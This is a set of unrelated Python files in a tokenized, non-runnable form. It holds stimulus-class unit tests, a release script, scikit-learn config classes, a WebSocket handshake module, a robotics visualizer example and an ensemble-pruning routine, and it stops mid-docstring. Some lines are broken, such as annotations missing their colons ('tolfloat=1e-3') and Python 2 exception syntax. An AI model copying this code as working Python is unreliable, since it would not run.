np.array(2<times>[self.AMPLITUDE]))<block_end><def_stmt>test_start_end_input self<block_start>sin=SinusoidalInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(sin[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(sin[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>sin=SinusoidalInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>params=sin.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE 
"start":STIM_START "dc_bias":<false> "end":STIM_END } )<block_end><def_stmt>test_set_params self<block_start>sin=SinusoidalInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>UPDATE={"amplitude":43.0 "seed":12 "start":"None"}<line_sep>sin.update_params(UPDATE)<line_sep>params=sin.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE "dc_bias":<false> "end":STIM_END **UPDATE "start":<none> } )<block_end><block_end><class_stmt>TestSquareInput(unittest.TestCase)<block_start>AMPLITUDE=2.3<line_sep>FREQUENCY=20.0<def_stmt>test_generate_input self<block_start>sq=SquareInput(amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(sq np.ndarray))<line_sep>self.assertTupleEqual(sq.shape SHAPE)<line_sep>np.testing.assert_almost_equal(np.mean(sq axis=1) np.array(2<times>[self.AMPLITUDE]))<block_end><def_stmt>test_start_end_input self<block_start>sq=SquareInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(sq[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(sq[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>sq=SquareInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>params=sq.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE "start":STIM_START "end":STIM_END "dc_bias":<false> } )<block_end><def_stmt>test_set_params self<block_start>sq=SquareInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>UPDATE={"amplitude":43.0 "seed":12 "start":"None"}<line_sep>sq.update_params(UPDATE)<line_sep>params=sq.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE "end":STIM_END "dc_bias":<false> **UPDATE "start":<none> } )<block_end><block_end><class_stmt>TestLinearRampInput(unittest.TestCase)<block_start>INP_MAX=5.0<line_sep>RAMP_LENGTH=2.0<def_stmt>test_generate_input self<block_start>ramp=LinearRampInput(inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ramp np.ndarray))<line_sep>self.assertTupleEqual(ramp.shape SHAPE)<line_sep>np.testing.assert_equal(np.max(ramp axis=1) np.array(2<times>[self.INP_MAX]))<line_sep>np.testing.assert_equal(np.min(ramp axis=1) np.array(2<times>[0.25]))<block_end><def_stmt>test_start_end_input self<block_start>ramp=LinearRampInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(ramp[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(ramp[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>ramp=LinearRampInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 )<line_sep>params=ramp.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "ramp_length":self.RAMP_LENGTH "start":STIM_START "end":STIM_END } )<block_end><def_stmt>test_set_params 
self<block_start>ramp=LinearRampInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 )<line_sep>UPDATE={"inp_max":41.0 "seed":12}<line_sep>ramp.update_params(UPDATE)<line_sep>params=ramp.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "ramp_length":self.RAMP_LENGTH "start":STIM_START "end":STIM_END **UPDATE } )<block_end><block_end><class_stmt>TestExponentialInput(unittest.TestCase)<block_start>INP_MAX=5.0<line_sep>EXP_COEF=30.0<line_sep>EXP_TYPE="rise"<def_stmt>test_generate_input_rise self<block_start>exp_rise=ExponentialInput(inp_max=self.INP_MAX exp_type="rise" n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(exp_rise np.ndarray))<line_sep>self.assertTupleEqual(exp_rise.shape SHAPE)<line_sep>np.testing.assert_almost_equal(np.max(exp_rise axis=1) np.array(2<times>[self.INP_MAX]))<line_sep>self.assertTrue(np.all(np.diff(exp_rise)<ge>0))<block_end><def_stmt>test_generate_input_decay self<block_start>exp_decay=ExponentialInput(inp_max=self.INP_MAX exp_type="decay" n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(exp_decay np.ndarray))<line_sep>self.assertTupleEqual(exp_decay.shape SHAPE)<line_sep>self.assertTrue(np.all(np.diff(exp_decay)<le>0))<block_end><def_stmt>test_start_end_input self<block_start>exp_rise=ExponentialInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(exp_rise[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(exp_rise[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>exp_rise=ExponentialInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX n=2 seed=42 )<line_sep>params=exp_rise.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "exp_coef":self.EXP_COEF "exp_type":self.EXP_TYPE "start":STIM_START "end":STIM_END } )<block_end><def_stmt>test_set_params self<block_start>exp_rise=ExponentialInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX n=2 seed=42 )<line_sep>UPDATE={"inp_max":41.0 "seed":12}<line_sep>exp_rise.update_params(UPDATE)<line_sep>params=exp_rise.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "exp_coef":self.EXP_COEF "exp_type":self.EXP_TYPE "start":STIM_START "end":STIM_END **UPDATE } )<block_end><block_end><class_stmt>TestSummedStimulus(unittest.TestCase)<block_start><def_stmt>_create_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=0.1 sigma=0.02 tau=2.0 n=2)<line_sep>sq=SquareInput(amplitude=0.2 frequency=50 n=2 start=5)<line_sep>sin=SinusoidalInput(amplitude=0.1 frequency=100 n=2 start=2)<line_sep>step=StepInput(step_size=0.5 n=2 start=7)<line_sep><return>sq+(sin+step+ou)<block_end><def_stmt>test_init self<block_start>summed=self._create_input()<line_sep>self.assertEqual(len(summed) 4)<line_sep>self.assertTrue(isinstance(summed SummedStimulus))<line_sep>self.assertEqual(summed.n 2)<line_sep>self.assertEqual(len(summed.inputs) 4)<block_end><def_stmt>test_set_n self<block_start>summed=self._create_input()<line_sep>self.assertEqual(summed.n 2)<line_sep>ts=summed.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 2)<line_sep>summed.n=5<line_sep>self.assertEqual(summed.n 5)<line_sep>ts=summed.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 
5)<block_end><def_stmt>test_generate_input self<block_start>summed=self._create_input()<line_sep>ts=summed.as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=summed.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><def_stmt>test_get_params self<block_start>summed=self._create_input()<line_sep>params=summed.get_params()<line_sep>self.assertTrue(isinstance(params dict))<line_sep>self.assertEqual(len(params) 1+len(summed.inputs))<for_stmt>i,process enumerate(summed)<block_start>self.assertDictEqual(process.get_params() params[f"input_{i}"])<block_end><block_end><def_stmt>test_update_params self<block_start>summed=self._create_input()<line_sep>UPDATE_DICT={f"input_{i}":{"n":3}<for>i range(len(summed))}<line_sep>summed.update_params(UPDATE_DICT)<line_sep>self.assertEqual(summed.n 3)<block_end><block_end><class_stmt>TestConcatenatedStimulus(unittest.TestCase)<block_start><def_stmt>_create_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=0.1 sigma=0.02 tau=2.0 n=2)<line_sep>sq=SquareInput(amplitude=0.2 frequency=20.0 n=2)<line_sep>sin=SinusoidalInput(amplitude=0.1 frequency=10.0 n=2)<line_sep>step=StepInput(step_size=0.5 n=2)<line_sep><return>ou&(sq&sin&step)<block_end><def_stmt>test_init self<block_start>conc=self._create_input()<line_sep>self.assertEqual(len(conc) 4)<line_sep>self.assertTrue(isinstance(conc ConcatenatedStimulus))<line_sep>self.assertEqual(conc.n 2)<line_sep>self.assertEqual(len(conc.inputs) 4)<block_end><def_stmt>test_set_n self<block_start>conc=self._create_input()<line_sep>self.assertEqual(conc.n 2)<line_sep>ts=conc.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 2)<line_sep>conc.n=5<line_sep>self.assertEqual(conc.n 5)<line_sep>ts=conc.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 5)<block_end><def_stmt>test_generate_input self<block_start>conc=self._create_input()<line_sep>ts=conc.as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=conc.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><def_stmt>test_get_params self<block_start>conc=self._create_input()<line_sep>params=conc.get_params()<line_sep>self.assertTrue(isinstance(params dict))<line_sep>self.assertEqual(len(params) 1+len(conc.inputs))<for_stmt>i,process enumerate(conc)<block_start>self.assertDictEqual(process.get_params() params[f"input_{i}"])<block_end><block_end><def_stmt>test_update_params self<block_start>conc=self._create_input()<line_sep>UPDATE_DICT={f"input_{i}":{"n":3}<for>i range(len(conc))}<line_sep>conc.update_params(UPDATE_DICT)<line_sep>self.assertEqual(conc.n 3)<block_end><block_end><class_stmt>TestBeastInput(unittest.TestCase)<block_start><def_stmt>_create_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=0.1 sigma=0.02 tau=2.0 n=2)<line_sep>sq=SquareInput(amplitude=0.2 frequency=20.0 n=2)<line_sep>sin=SinusoidalInput(amplitude=0.1 frequency=10.0 n=2)<line_sep>step=StepInput(step_size=0.5 n=2)<line_sep><return>(sq+sin)&(step+ou)<block_end><def_stmt>test_init self<block_start>beast=self._create_input()<line_sep>self.assertEqual(len(beast) 2)<line_sep>self.assertTrue(isinstance(beast ConcatenatedStimulus))<for_stmt>process beast<block_start>self.assertTrue(isinstance(process SummedStimulus))<block_end>self.assertEqual(beast.n 
2)<block_end><def_stmt>test_set_n self<block_start>beast=self._create_input()<line_sep>self.assertEqual(beast.n 2)<line_sep>ts=beast.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 2)<line_sep>beast.n=5<line_sep>self.assertEqual(beast.n 5)<line_sep>ts=beast.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 5)<block_end><def_stmt>test_generate_input self<block_start>beast=self._create_input()<line_sep>ts=beast.as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=beast.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><def_stmt>test_get_params self<block_start>beast=self._create_input()<line_sep>params=beast.get_params()<line_sep>self.assertTrue(isinstance(params dict))<line_sep>self.assertEqual(len(params) 1+len(beast.inputs))<for_stmt>i,process enumerate(beast)<block_start>self.assertDictEqual(process.get_params() params[f"input_{i}"])<block_end><block_end><block_end><class_stmt>TestRectifiedInput(unittest.TestCase)<block_start><def_stmt>test_init self<block_start>rect=RectifiedInput(0.2 n=2)<line_sep>self.assertTrue(isinstance(rect ConcatenatedStimulus))<line_sep>self.assertEqual(len(rect) 5)<line_sep>self.assertEqual(rect.n 2)<block_end><def_stmt>test_generate self<block_start>rect=RectifiedInput(0.2 n=2)<line_sep>ts=rect.as_array(DURATION DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=rect.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end> |
<import_from_stmt>os path<import_stmt>click<import_from_stmt>.settings NEW_BUILDS_DIRNAME<import_from_stmt>.util print_and_run read_version_data<def_stmt>_wait_for_build filename<block_start>click.echo('Build the client in another window, and return here afterwards')<line_sep>version=read_version_data()['version']<line_sep>filename=path.join(NEW_BUILDS_DIRNAME filename.format(version=version))<while_stmt><true><block_start><if_stmt>click.confirm('Has the build completed? ')<block_start><if_stmt>path.exists(filename)<block_start><return><block_end>click.echo(f'File {filename} not found, please try again.')<block_end><block_end><block_end>@click.command()<def_stmt>do_release <block_start>print_and_run(('python' '-m' 'make.clean'))<line_sep>print_and_run(('python' '-m' 'make' '--release'))<if_stmt>click.confirm('Build Docker container?' default=<true>)<block_start>print_and_run(('python' '-m' 'make' '--docker' '--release'))<block_end><if_stmt>click.confirm('Build MacOS client? ' default=<true>)<block_start>_wait_for_build('Kanmail-mac-{version}.tar.gz')<block_end><if_stmt>click.confirm('Build Windows client? ' default=<true>)<block_start>_wait_for_build('Kanmail-win-{version}.zip')<block_end><if_stmt>click.confirm('Build Linux client? ' default=<false>)<block_start>_wait_for_build('Kanmail-nix64-{version}.tar.gz')<block_end>print_and_run(('python' '-m' 'make' '--release' '--complete'))<block_end><if_stmt>__name__<eq>'__main__'<block_start>do_release()<block_end> |
"""各种模型的设置"""<import_from_stmt>typing Union Optional Dict<import_from_stmt>.base ConfigBase<class_stmt>MLModelConfig(ConfigBase)<block_start><pass><block_end><class_stmt>LogisticRegressionConfig(MLModelConfig)<block_start>"""参考:https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html"""<line_sep># penalty{‘l1’, ‘l2’, ‘elasticnet’, ‘none’} Used to specify the norm used in the penalization.
penalty:str="l2"<line_sep># Dual or primal formulation. Dual formulation is only implemented
# for l2 penalty with liblinear solver. Prefer dual=False when n_samples > n_features.
dual:bool=<false><line_sep># Tolerance for stopping criteria.
tol:float=1e-4<line_sep># Inverse of regularization strength
# must be a positive float. Like in support vector machines, smaller values specify stronger regularization.
C:float=1.0<line_sep># Specifies if a constant(a.k.a. bias or intercept) should be added to the decision function.
fit_intercept:bool=<true><line_sep># Useful only when the solver ‘liblinear’ is used and self.fit_intercept is set to True.
intercept_scaling:float=1<line_sep># dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
class_weight:Union[str <none> Dict[str float]]="balanced"<line_sep># {‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’, ‘saga’}
# Algorithm to use in the optimization problem.
# For small datasets, ‘liblinear’ is a good choice, whereas ‘sag’ and ‘saga’ are faster for large ones.
solver:str='sag'<line_sep># Maximum number of iterations taken for the solvers to converge.
max_iter:int=1000<line_sep># multi_class{‘auto’, ‘ovr’, ‘multinomial’} =’auto’
multi_class:str='ovr'<line_sep># For the liblinear and lbfgs solvers set verbose to any positive number for verbosity.
verbose:int=0<line_sep># The seed of the pseudo random number generator to use when shuffling the data.
# If int, random_state is the seed used by the random number generator
# If None, the random number generator is the RandomState instance used
# by np.random. Used when solver == ‘sag’ or ‘liblinear’.
random_state:int=<none><line_sep># Number of CPU cores used when parallelizing over classes if multi_class =’ovr’”. T
n_jobs:int=<none><line_sep># The Elastic-Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio:Optional[float]=<none><block_end><class_stmt>LinearSVMConfig(MLModelConfig)# dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
<block_start>class_weight:Union[str <none> Dict[str float]]="balanced"<line_sep># The penalty (aka regularization term) to be used. Defaults to ‘l2’ which is the standard regularizer for linear
# SVM models. ‘l1’ and ‘elasticnet’ might bring sparsity to the model (feature selection) not achievable with ‘l2’.
penalty:str='l2'<line_sep># Constant that multiplies the regularization term. Defaults to 0.0001.
# Also used to compute learning_rate when set to ‘optimal’.
alpha:float=0.0001<line_sep># The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1. l1_ratio = 0 corresponds to
# L2 penalty, l1_ratio = 1 to L1. Defaults to 0.15.
l1_ratio:float=0.15<line_sep># Whether the intercept should be estimated or not. If False, the data is assumed to be already centered.
fit_intercept:bool=<true><line_sep># The maximum number of passes over the training data(aka epochs).
# It only impacts the behavior in the fit method, and not the partial_fit method.
max_iter:int=1000<line_sep># The stopping criterion. If it is not None, the iterations will stop when(loss > best_loss - tol)
# for n_iter_no_change consecutive epochs.
tolfloat=1e-3<line_sep># Whether or not the training data should be shuffled after each epoch.
shufflebool=<true><line_sep># The verbosity level.
verboseint=0<line_sep># The number of CPUs to use to do the OVA(One Versus All, for multi-class problems) computation. None means 1
# unless in a joblib.parallel_backend context. -1 means using all processors. See Glossary for more details.
n_jobs:int=<none><line_sep># The seed of the pseudo random number generator to use when shuffling the data. If int, random_state is the
# seed used by the random number generator
# If RandomState instance, random_state is the random number generator
# If None, the random number generator is the RandomState instance used by np.random.
random_state:Optional[int]=<none><line_sep># Number of iterations with no improvement to wait before early stopping.
n_iter_no_change:int=5<block_end> |
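# Hedged sketch (illustration only, not part of the original module): build a
# scikit-learn LogisticRegression from a LogisticRegressionConfig instance,
# forwarding only the fields that mirror sklearn's constructor parameters.
def build_logistic_regression(config: "LogisticRegressionConfig"):
    from sklearn.linear_model import LogisticRegression
    return LogisticRegression(
        penalty=config.penalty,
        C=config.C,
        class_weight=config.class_weight,
        solver=config.solver,
        max_iter=config.max_iter,
        multi_class=config.multi_class,
    )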
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket opening handshake processor. This class try to apply available
opening handshake processors for each protocol version until a connection is
successfully established.
"""<import_from_future_stmt> absolute_import<import_stmt>logging<import_from_stmt>mod_pywebsocket common<import_from_stmt>mod_pywebsocket.handshake hybi<line_sep># Export AbortedByUserException, HandshakeException, and VersionException
# symbol from this module.
<import_from_stmt>mod_pywebsocket.handshake._base AbortedByUserException<import_from_stmt>mod_pywebsocket.handshake._base HandshakeException<import_from_stmt>mod_pywebsocket.handshake._base VersionException<line_sep>_LOGGER=logging.getLogger(__name__)<def_stmt>do_handshake request dispatcher<block_start>"""Performs WebSocket handshake.
Args:
request: mod_python request.
dispatcher: Dispatcher (dispatch.Dispatcher).
Handshaker will add attributes such as ws_resource in performing
handshake.
"""<line_sep>_LOGGER.debug('Client\'s opening handshake resource: %r' request.uri)<line_sep># To print mimetools.Message as escaped one-line string, we converts
# headers_in to dict object. Without conversion, if we use %r, it just
# prints the type and address, and if we use %s, it prints the original
# header string as multiple lines.
#
# Both mimetools.Message and MpTable_Type of mod_python can be
# converted to dict.
#
# mimetools.Message.__str__ returns the original header string.
# dict(mimetools.Message object) returns the map from header names to
# header values. While MpTable_Type doesn't have such __str__ but just
# __repr__ which formats itself as well as dictionary object.
_LOGGER.debug('Client\'s opening handshake headers: %r' dict(request.headers_in))<line_sep>handshakers=[]<line_sep>handshakers.append(('RFC 6455' hybi.Handshaker(request dispatcher)))<for_stmt>name,handshaker handshakers<block_start>_LOGGER.debug('Trying protocol version %s' name)<try_stmt><block_start>handshaker.do_handshake()<line_sep>_LOGGER.info('Established (%s protocol)' name)<line_sep><return><block_end><except_stmt>HandshakeException<as>e<block_start>_LOGGER.debug('Failed to complete opening handshake as %s protocol: %r' name e)<if_stmt>e.status<block_start><raise>e<block_end><block_end><except_stmt>AbortedByUserException<as>e<block_start><raise><block_end><except_stmt>VersionException<as>e<block_start><raise><block_end><block_end># TODO(toyoshim): Add a test to cover the case all handshakers fail.
<raise>HandshakeException('Failed to complete opening handshake for all available protocols' status=common.HTTP_STATUS_BAD_REQUEST)<block_end># vi:sts=4 sw=4 et
|
# NOTE: this example needs gepetto-gui to be installed
# usage: launch gepetto-gui and then run this test
<import_stmt>pinocchio<as>pin<import_stmt>numpy<as>np<import_stmt>sys<import_stmt>os<import_from_stmt>os.path dirname join abspath<import_from_stmt>pinocchio.visualize GepettoVisualizer<line_sep># Load the URDF model.
# Conversion with str seems to be necessary when executing this file with ipython
pinocchio_model_dir=join(dirname(dirname(str(abspath(__file__)))) "models")<line_sep>model_path=join(pinocchio_model_dir "example-robot-data/robots")<line_sep>mesh_dir=pinocchio_model_dir<line_sep>urdf_filename="talos_reduced.urdf"<line_sep>urdf_model_path=join(join(model_path "talos_data/robots") urdf_filename)<line_sep>model,collision_model,visual_model=pin.buildModelsFromUrdf(urdf_model_path mesh_dir pin.JointModelFreeFlyer())<line_sep>viz=GepettoVisualizer(model collision_model visual_model)<line_sep># Initialize the viewer.
<try_stmt><block_start>viz.initViewer()<block_end><except_stmt>ImportError<as>err<block_start>print("Error while initializing the viewer. It seems you should install gepetto-viewer")<line_sep>print(err)<line_sep>sys.exit(0)<block_end><try_stmt><block_start>viz.loadViewerModel("pinocchio")<block_end><except_stmt>AttributeError<as>err<block_start>print("Error while loading the viewer model. It seems you should start gepetto-viewer")<line_sep>print(err)<line_sep>sys.exit(0)<block_end># Display a robot configuration.
q0=pin.neutral(model)<line_sep>viz.display(q0)<line_sep># Display another robot.
viz2=GepettoVisualizer(model collision_model visual_model)<line_sep>viz2.initViewer(viz.viewer)<line_sep>viz2.loadViewerModel(rootNodeName="pinocchio2")<line_sep>q=q0.copy()<line_sep>q[1]=1.0<line_sep>viz2.display(q)<line_sep> |
"""Implementation of the Dynamic Frienemy Pruning (DFP) algorithm for online
pruning of base classifiers.
References
----------
<NAME>., <NAME>. and <NAME>., Online Pruning
of Base Classifiers for Dynamic Ensemble Selection,
Pattern Recognition, vol. 72, December 2017, pp 44-58.
Cruz, <NAME>, <NAME>, <NAME>, and <NAME>.
"FIRE-DES++: Enhanced online pruning of base classifiers for dynamic ensemble
selection." Pattern Recognition 85 (2019): 149-160.
"""<line_sep># coding=utf-8
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
<import_stmt>numpy<as>np<import_from_stmt>sklearn.neighbors KNeighborsClassifier<def_stmt>frienemy_pruning X_query X_dsel y_dsel ensemble k<block_start>"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
A classifier crosses the region of competence if it correctly
classifies at least one sample for each different class in the region.
Parameters
----------
X_query : array-like of shape (n_samples, n_features)
Test set.
X_dsel : array-like of shape (n_samples, n_features)
Dynamic selection set.
y_dsel : array-like of shape (n_samples,)
The target values (Dynamic selection set).
ensemble : list of shape = [n_classifiers]
The ensemble of classifiers to be pruned.
k : int
Number of neighbors used to compute the regions of competence.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""<line_sep>predictions=np.zeros((X_dsel.shape[0] len(ensemble)) dtype=np.intp)<for_stmt>index,clf enumerate(ensemble)<block_start>predictions[: index]=clf.predict(X_dsel)<block_end>hit_miss=predictions<eq>y_dsel[: np.newaxis]<line_sep>competence_region=KNeighborsClassifier(n_neighbors=k).fit(X_dsel y_dsel)<line_sep>neighbors=competence_region.kneighbors(X_query return_distance=<false>)<line_sep><return>frienemy_pruning_preprocessed(neighbors y_dsel hit_miss)<block_end><def_stmt>frienemy_pruning_preprocessed neighbors y_val hit_miss<block_start>"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
A classifier crosses the region of competence if it correctly
classifies at least one sample for each different class in the region.
Notes
-----
This implementation assumes the regions of competence of each query example
(neighbors) and the predictions for the dynamic selection data (hit_miss)
were already pre-computed.
Parameters
----------
neighbors : array-like of shape (n_samples, n_neighbors)
Indices of the k nearest neighbors.
y_val : array-like of shape (n_samples,)
The target values (class labels).
hit_miss : array-like of shape (n_samples, n_classifiers)
Matrix containing 1 when the base classifier made the correct
prediction, 0 otherwise.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""<if_stmt>neighbors.ndim<l>2<block_start>neighbors=neighbors.reshape(1 -1)<block_end>n_samples=neighbors.shape[0]<line_sep>n_classifiers=hit_miss.shape[1]<line_sep>dfp_mask=np.zeros((n_samples n_classifiers))<line_sep># TODO: vectorize this code?
<for_stmt>sample_idx range(n_samples)<block_start>curr_neighbors=neighbors[sample_idx]<line_sep>neighbors_y=y_val[curr_neighbors]<if_stmt>len(set(neighbors_y))<g>1# Indecision region. Check if the base classifier predicts the
# correct label for a sample belonging to each class.
<block_start><for_stmt>clf_index range(n_classifiers)<block_start>[mask]=np.where(hit_miss[curr_neighbors clf_index])<if_stmt>len(set(neighbors_y[mask]))<g>1<block_start>dfp_mask[sample_idx clf_index]=1.0<block_end><block_end><block_end><else_stmt># Safe region.
<block_start>dfp_mask[sample_idx :]=1.0<block_end><block_end># rows where all classifiers were pruned are set to 1.0
dfp_mask[np.all(dfp_mask<eq>0 axis=1)]=1.0<line_sep><return>dfp_mask<block_end> |
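# Hedged usage sketch (illustration only, not part of the original module): prune a
# toy ensemble of two scikit-learn classifiers for two query points with k=3
# neighbors. The data and base classifiers are arbitrary placeholders.
if __name__ == "__main__":
    from sklearn.linear_model import Perceptron
    from sklearn.tree import DecisionTreeClassifier

    rng = np.random.RandomState(0)
    X_dsel = rng.rand(30, 2)
    y_dsel = (X_dsel[:, 0] > 0.5).astype(int)
    ensemble = [Perceptron(max_iter=100).fit(X_dsel, y_dsel),
                DecisionTreeClassifier(max_depth=2).fit(X_dsel, y_dsel)]
    X_query = rng.rand(2, 2)
    dfp_mask = frienemy_pruning(X_query, X_dsel, y_dsel, ensemble, k=3)
    print(dfp_mask)  # shape (2, 2): one row per query, one column per classifier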
"""Miscellaneous file operations"""<import_stmt>os os.path errno<def_stmt>ensureDir dir<block_start>"""Ensure that a directory exists, creating it (and parents) if needed."""<try_stmt><block_start>os.makedirs(dir)<block_end><except_stmt>OSError e<block_start><if_stmt>e.errno<ne>errno.EEXIST<block_start><raise>e<block_end><block_end><block_end><def_stmt>ensureFileDir fname<block_start>"""Ensure that the directory for a file exists, creating it (and parents) if needed.
